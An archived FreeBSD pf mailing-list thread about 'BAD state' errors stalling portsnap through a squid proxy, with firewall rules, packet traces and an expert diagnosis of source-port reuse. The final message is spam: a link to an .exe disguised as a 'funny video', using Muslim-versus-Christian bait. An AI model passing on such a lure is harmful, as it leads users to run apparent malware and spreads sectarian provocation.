about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 05 Oct 2006 16:08:35 -0000 I have a situation where I have a number of FreeBSD 6.x servers that are restricted from directly connecting to the internet. To allow them to effectively use ports and portsnap, I have a squid http proxy that they are allowed to use to reach the web. This squid server is behind a pf bridging firewall. If I run portsnap fetch update on one of my servers, and if it has to download more than 300-800 files, there is a good chance that portsnap downloading will stall because pf decided to start blocking the connections suddenly. Sometimes it appears to be state related: (44.18 is the squid server (trident), 37.163 is the system running portsnap (ice)) Oct 5 11:22:03 jolly-fw1 kernel: pf: BAD state: TCP 35.9.44.18:3128 35.9.44.18:3128 35.9.37.163:55357 [lo=646710754 high=646777361 win=33304 modulator=0 wscale=1] [lo=4033525074 high=4033590770 win=33304 modulator=0 wscale=1] 9:9 S seq=650709460 ack=4033525074 len=0 ackskew=0 pkts=5:4 dir=in,fwd Oct 5 11:22:03 jolly-fw1 kernel: pf: State failure on: 1 | 5 Oct 5 11:22:06 jolly-fw1 kernel: pf: BAD state: TCP 35.9.44.18:3128 35.9.44.18:3128 35.9.37.163:55357 [lo=646710754 high=646777361 win=33304 modulator=0 wscale=1] [lo=4033525074 high=4033590770 win=33304 modulator=0 wscale=1] 9:9 S seq=650709460 ack=4033525074 len=0 ackskew=0 pkts=5:4 dir=in,fwd Oct 5 11:22:06 jolly-fw1 kernel: pf: State failure on: 1 | 5 Oct 5 11:22:09 jolly-fw1 kernel: pf: BAD state: TCP 35.9.44.18:3128 35.9.44.18:3128 35.9.37.163:55357 [lo=646710754 high=646777361 win=33304 modulator=0 wscale=1] [lo=4033525074 high=4033590770 win=33304 modulator=0 wscale=1] 9:9 S seq=650709460 ack=4033525074 len=0 ackskew=0 pkts=5:4 dir=in,fwd Oct 5 11:22:09 jolly-fw1 kernel: pf: State failure on: 1 | 5 Oct 5 11:22:12 jolly-fw1 kernel: pf: BAD state: TCP 35.9.44.18:3128 35.9.44.18:3128 35.9.37.163:55357 [lo=646710754 high=646777361 win=33304 modulator=0 wscale=1] [lo=4033525074 high=4033590770 win=33304 modulator=0 wscale=1] 9:9 S seq=650709460 ack=4033525074 len=0 ackskew=0 pkts=5:4 dir=in,fwd Oct 5 11:22:12 jolly-fw1 kernel: pf: State failure on: 1 | 5 I am using: set state-policy if-bound set timeout { tcp.closed 15 } pfctl -sr shows: scrub in on em0 all no-df random-id min-ttl 10 max-mss 1460 fragment reassemble scrub out on em0 all no-df random-id min-ttl 10 max-mss 1460 fragment reassemble block drop in log quick on em0 proto tcp all flags /S block drop in log quick on em0 proto tcp all flags /FSRA block drop in log quick on em0 proto tcp all flags /FSRAU block drop in log quick on em0 proto tcp all flags A/A block drop in log quick on em0 proto tcp all flags F/FSRA block drop in log quick on em0 proto tcp all flags U/FSRAU block drop in log quick on em0 proto tcp all flags FS/FS block drop in log quick on em0 proto tcp all flags FS/FSRA block drop in log quick on em0 proto tcp all flags SR/SR block drop in log quick on em0 proto tcp all flags FPU/FPU block drop in log quick on em0 proto tcp all flags FPU/FSRPAUEW block drop in log quick on em0 proto tcp all flags FSRAU/FSRAU block drop in log quick on em0 proto tcp all flags FSRPAU/FSRPAU pass quick on lo0 all pass quick on em1 all block drop log-all on em0 all pass in quick on em0 inet proto tcp from any to 35.9.44.100 port = ssh flags S/SA keep state (if-bound) pass in quick on em0 inet proto tcp from any to 35.9.44.18 port = ssh flags S/SA keep state (if-bound) pass in quick on em0 inet proto tcp from any to 35.9.44.18 port = 3128 flags S/SA keep state (if-bound) pass out on em0 inet proto icmp all icmp-type echoreq keep state (if-bound) pass in on em0 inet proto icmp all icmp-type echoreq keep state (if-bound) pass out on em0 proto tcp all keep state (if-bound) pass out on em0 proto udp all keep state (if-bound) At the time of the stall, I had 285 state entries according to pfctl -sr. 276 of them were to port 3128, and all 276 were FIN_WAIT_2:FIN_WAIT_2 including for port 55357: em0 tcp 35.9.44.18:3128 <- 35.9.37.163:55357 FIN_WAIT_2:FIN_WAIT_2 em0 is the external facing interface, em1 is directly connected to the squid server. I think this is the relevant part from the packet capture, I filtered on port 55357 because of the state failures above and because I could see tcp retries at the very end of the trace. The trace was started at 1160061707.897973, therefore most of the events below happened at 11 seconds, followed by 15, 18, 21s for the last three packets. 1160061719.730940 IP (tos 0x0, ttl 63, id 51535, offset 0, flags [DF], proto: TCP (6), length: 64) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: S, cksum 0xd2c5 (correct), 646710499:646710499(0) win 65535 1160061719.731150 IP (tos 0x0, ttl 64, id 38901, offset 0, flags [none], proto: TCP (6), length: 64) trident.egr.msu.edu.3128 > ice.egr.msu.edu.55357: S, cksum 0xb79c (correct), 4033524160:4033524160(0) ack 646710500 win 65535 1160061719.731431 IP (tos 0x0, ttl 63, id 51536, offset 0, flags [DF], proto: TCP (6), length: 52) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: ., cksum 0x754f (correct), ack 1 win 33304 1160061719.731441 IP (tos 0x0, ttl 63, id 51537, offset 0, flags [DF], proto: TCP (6), length: 305) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: P, cksum 0xd903 (correct), 1:254(253) ack 1 win 33304 1160061719.777369 IP (tos 0x0, ttl 64, id 32422, offset 0, flags [none], proto: TCP (6), length: 964) trident.egr.msu.edu.3128 > ice.egr.msu.edu.55357: P, cksum 0xe6b1 (correct), 1:913(912) ack 254 win 33304 1160061719.777380 IP (tos 0x0, ttl 64, id 51616, offset 0, flags [none], proto: TCP (6), length: 52) trident.egr.msu.edu.3128 > ice.egr.msu.edu.55357: F, cksum 0x7093 (correct), 913:913(0) ack 254 win 33304 1160061719.777656 IP (tos 0x0, ttl 63, id 51539, offset 0, flags [DF], proto: TCP (6), length: 52) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: ., cksum 0x722d (correct), ack 914 win 32848 1160061719.778030 IP (tos 0x0, ttl 63, id 51540, offset 0, flags [DF], proto: TCP (6), length: 52) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: F, cksum 0x722b (correct), 254:254(0) ack 914 win 32848 1160061719.778240 IP (tos 0x0, ttl 64, id 8633, offset 0, flags [none], proto: TCP (6), length: 52) trident.egr.msu.edu.3128 > ice.egr.msu.edu.55357: ., cksum 0x7063 (correct), ack 255 win 33303 1160061722.978289 IP (tos 0x0, ttl 63, id 52907, offset 0, flags [DF], proto: TCP (6), length: 64) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: S, cksum 0xc0e8 (correct), 650709460:650709460(0) win 65535 1160061725.978171 IP (tos 0x0, ttl 63, id 52924, offset 0, flags [DF], proto: TCP (6), length: 64) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: S, cksum 0xb530 (correct), 650709460:650709460(0) win 65535 1160061729.178434 IP (tos 0x0, ttl 63, id 53941, offset 0, flags [DF], proto: TCP (6), length: 64) ice.egr.msu.edu.55357 > trident.egr.msu.edu.3128: S, cksum 0xa8b0 (correct), 650709460:650709460(0) win 65535 This issue has been plaguing me for as long as I can remember but I just haven't sat down and reported it yet, tried to debug it by myself. I don't think I have any unusual kernel sysctl tweaks enabled, just the defaults. I think this indicates a bigger issue than just portsnap which I need to understand better before I can deploy a pf firewall infront of bigger networks with more diverse traffic. I'd appreciate some help. I suspect a tcp port is perhaps being reused too quickly, but I haven't quite caught it. Let me know if I can provide more information or do further testing. Thanks. I have posted the pfctl -ss output, and a tcpdump pcap dump of the session to: http://www.egr.msu.edu/~mcdouga9/state5-ice http://www.egr.msu.edu/~mcdouga9/pkts-portsnap1-ice.gz From owner-freebsd-pf@FreeBSD.ORG Thu Oct 5 16:20:54 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2432A16A5A0 for ; Thu, 5 Oct 2006 16:20:54 +0000 (UTC) (envelope-from dhartmei@insomnia.benzedrine.cx) Received: from insomnia.benzedrine.cx (insomnia.benzedrine.cx [62.65.145.30]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6F4CD43E52 for ; Thu, 5 Oct 2006 16:20:30 +0000 (GMT) (envelope-from dhartmei@insomnia.benzedrine.cx) Received: from insomnia.benzedrine.cx (dhartmei@localhost [127.0.0.1]) by insomnia.benzedrine.cx (8.13.4/8.13.4) with ESMTP id k95GKLaX023405 (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=NO); Thu, 5 Oct 2006 18:20:21 +0200 (MEST) Received: (from dhartmei@localhost) by insomnia.benzedrine.cx (8.13.4/8.12.10/Submit) id k95GKL83010358; Thu, 5 Oct 2006 18:20:21 +0200 (MEST) Date: Thu, 5 Oct 2006 18:20:21 +0200 From: Daniel Hartmeier To: Adam McDougall Message-ID: <20061005162021.GD21693@insomnia.benzedrine.cx> References: <20061005160827.GB46920@egr.msu.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20061005160827.GB46920@egr.msu.edu> User-Agent: Mutt/1.5.10i Cc: freebsd-pf@freebsd.org Subject: Re: pf: BAD state happens often with portsnap fetch update X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 05 Oct 2006 16:20:54 -0000 On Thu, Oct 05, 2006 at 12:08:27PM -0400, Adam McDougall wrote: > (44.18 is the squid server (trident), 37.163 is the system running portsnap (ice)) > > Oct 5 11:22:03 jolly-fw1 kernel: pf: BAD state: TCP 35.9.44.18:3128 35.9.44.18:3128 35.9.37.163:55357 > [lo=646710754 high=646777361 win=33304 modulator=0 wscale=1] [lo=4033525074 high=4033590770 win=33304 > modulator=0 wscale=1] 9:9 S seq=650709460 ack=4033525074 len=0 ackskew=0 pkts=5:4 dir=in,fwd > Oct 5 11:22:03 jolly-fw1 kernel: pf: State failure on: 1 | 5 The client (37.163) is running out of random high source ports, and starts re-using ports from previous connections, violating 2MSL. pf keeps states of closed connections around for a while (default is 90s), so late packets related to the old connection can be associated with the state. Creating a second, concurrent state entry for the same source/destination address:port quadruple is not possible. You can a) lower pf's tcp.closed timeout, so states of closed connections get purged sooner. b) give the client more random high ports (sysctl net.inet.ip.portrange.*) or add aliases, if the client can make use of them concurrently. c) reduce the connection establishment rate of the client. if portsnap needs one connection for every single file, that's a poor protocol, if you expect a single client to fetch thousands of files in a few seconds. Daniel From owner-freebsd-pf@FreeBSD.ORG Sat Oct 7 18:32:52 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4017A16A532 for ; Sat, 7 Oct 2006 18:32:52 +0000 (UTC) (envelope-from root@host169.ipowerweb.com) Received: from host169.ipowerweb.com (host169.ipowerweb.com [66.235.199.101]) by mx1.FreeBSD.org (Postfix) with SMTP id C213543D60 for ; Sat, 7 Oct 2006 18:32:51 +0000 (GMT) (envelope-from root@host169.ipowerweb.com) Received: (qmail 62512 invoked by uid 10061); 7 Oct 2006 18:31:28 -0000 Received: from 127.0.0.1 by host169.ipowerweb.com (envelope-from , uid 80) with qmail-scanner-1.25st (clamdscan: 0.88/1245. spamassassin: 3.1.0. perlscan: 1.25st. Clear:RC:1(127.0.0.1):SA:0(2.1/5.0):. Processed in 1.022225 secs); 07 Oct 2006 18:31:28 -0000 X-Spam-Status: No, hits=2.1 required=5.0 X-Spam-Level: ++ Date: 7 Oct 2006 18:31:27 -0000 Message-ID: <20061007183127.62500.qmail@host169.ipowerweb.com> To: freebsd-pf@freebsd.org From: George W bush MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit Subject: http://www.freewebtown.com/bustar00t/Musliman%20Vs%20Christian.exe X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 07 Oct 2006 18:32:52 -0000 Hey look at that funny video.You will have damn fun.hahahaha.Musliman Kicking christians ass. http://www.freewebtown.com/bustar00t/Musliman%20Vs%20Christian.exe